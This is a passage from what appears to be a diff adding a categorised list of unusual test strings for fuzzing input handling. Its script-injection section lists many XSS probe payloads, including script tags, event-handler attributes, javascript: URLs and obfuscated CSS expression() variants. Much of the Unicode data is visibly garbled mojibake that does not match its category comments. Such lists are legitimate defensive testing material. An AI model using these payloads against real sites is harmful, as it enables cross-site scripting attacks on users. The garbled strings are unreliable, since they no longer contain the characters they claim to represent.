smart quotes) + + "ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", "ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", "ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", + "ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", + "ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", "ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", + "ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", "`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", + "¬ナロ¬ナワ¬ナン¬ナ゙", + "チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭ" + "ᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフ" + "ヘホマ", + "ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + + // Unicode Subscript/Superscript/Accents + // + // Strings which contain unicode subscripts/superscripts; can cause rendering issues + + "¬チᄚ¬チᄡ¬チᄉ", "¬ツタ¬ツチ¬ツツ", "¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + + // Quotation Marks + // + // Strings which contain misplaced quotation marks; can cause encoding errors + + "'", "\"", "''", "\"\"", "'\"'", "\"''''\"'\"", "\"'\"'\"''''\"", "<foo val=¬タワbar¬タン />", "<foo val=¬タワbar¬タン />", "<foo val=¬タンbar¬タワ />", + "<foo val=`bar' />", + + // Two-Byte Characters + // + // Strings which contain two-byte characters: can cause rendering issues or character-length issues + + "ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", " ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", + "¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", "←テᄄ│ミᄑ₩ᅠᄐ", "↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", + 
"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ " + "→リᅠ→ᄚᄅ↑ᄚチ■ユリ", + "ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", "↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", + "ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + + // Changing length when lowercased + // + // Characters which increase in length (2 to 3 bytes) when lowercased + // Credit: https://twitter.com/jifa/status/625776454479970304 + + "ᄎ", "ᄒ", + + // Japanese Emoticons + // + // Strings which consists of Japanese-style emoticons which are popular on the web + + " ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", + "(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", "ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", "__ᄒロ(,_,*)", + " ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", + "ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", + ", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", + "(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", + "(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", "¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", "( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + + // Emoji + // + // Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + + "゚リヘ", "゚ムᄅ゚マᄑ", "゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", + "゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", + "¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ " + "゚メル", + "¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", + "゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", + "0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ " + "゚ヤ゚", + + // Regional Indicator Symbols + // + // Regional Indicator Symbols can be displayed differently across + // fonts, and have a number of special behaviors + + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + + // Unicode Numbers + // + // Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + + "ᄐムᄐメᄐモ", "ᄀᄁᆪ", + + // Right-To-Left Strings + // + // Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + + "ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ " + "ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ " + "ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. 
ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ " + "ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ " + "ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", + "ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", + "ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", "ᄋᄑ", + "ᄋᄎ", + "ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ " + "ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ " + "ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ " + "ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + + // Trick Unicode + // + // Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + + "¬タᆰ¬タᆰtest¬タᆰ", "¬タᆱtest¬タᆱ", "¬タᄅtest¬タᄅ", "test¬チᅠtest¬タᆱ", "¬チᆭtest¬チᄃ", + + // Zalgo Text + // + // Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + + "£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ " + "ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ " + "ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ " + "ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", + "ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ " + "ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ " + "ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ." 
+ "ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", + "ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ " + "ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ " + "ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf " + "ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", + "ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ " + "ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ " + "ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", + "Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + + // Unicode Upsidedown + // + // Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + + "ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン " + "ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ " + "ᆵᅦンᄍoᅨᆬ", + "00ᅨルᅥヨ$-", + + // Unicode font + // + // Strings which contain bold/italic/etc. 
versions of normal characters + + "ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ " + "ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", + "ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ " + "ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ " + "ンミンンミᄄンミᅠ", + "ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ " + "ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ " + "ンヨノンヨヤンヨフ", + "ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ " + "ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ " + "ンメナンメミンメネ", + "ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ " + "ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ " + "ンモᆳンモᄌンモᄚ", + "ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ " + "ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ " + "ンユユンユᅠンユリ", + "ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ " + "ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ " + "ンレヘンレリンレミ", + "¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ " + "¬メ゚¬メᆰ¬メᄁ", + + // Script Injection + // + // Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + "<script>alert(123)</script>", "<script>alert('123');</script>", "<img src=x onerror=alert(123) />", + "<svg><script>123<1>alert(123)</script>", "\"><script>alert(123)</script>", "'><script>alert(123)</script>", "><script>alert(123)</script>", + "</script><script>alert(123)</script>", "< / script >< script >alert(123)< / script >", " onfocus=JaVaSCript:alert(123) autofocus", + "\" onfocus=JaVaSCript:alert(123) autofocus", "' onfocus=JaVaSCript:alert(123) autofocus", "ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", + "<sc<script>ript>alert(123)</sc</script>ript>", "--><script>alert(123)</script>", "\";alert(123);t=\"", "';alert(123);t='", "JavaSCript:alert(123)", + ";alert(123);", "src=JaVaSCript:prompt(132)", "\"><script>alert(123);</script x=\"", "'><script>alert(123);</script x='", "><script>alert(123);</script x=", + "\" autofocus 
onkeyup=\"javascript:alert(123)", "' autofocus onkeyup='javascript:alert(123)", + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", "'`\"><\\x3Cscript>javascript:alert(1)</script>", + "'`\"><\\x00script>javascript:alert(1)</script>", "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", + "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", + "ABC<div 
style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", + "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>", + "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a 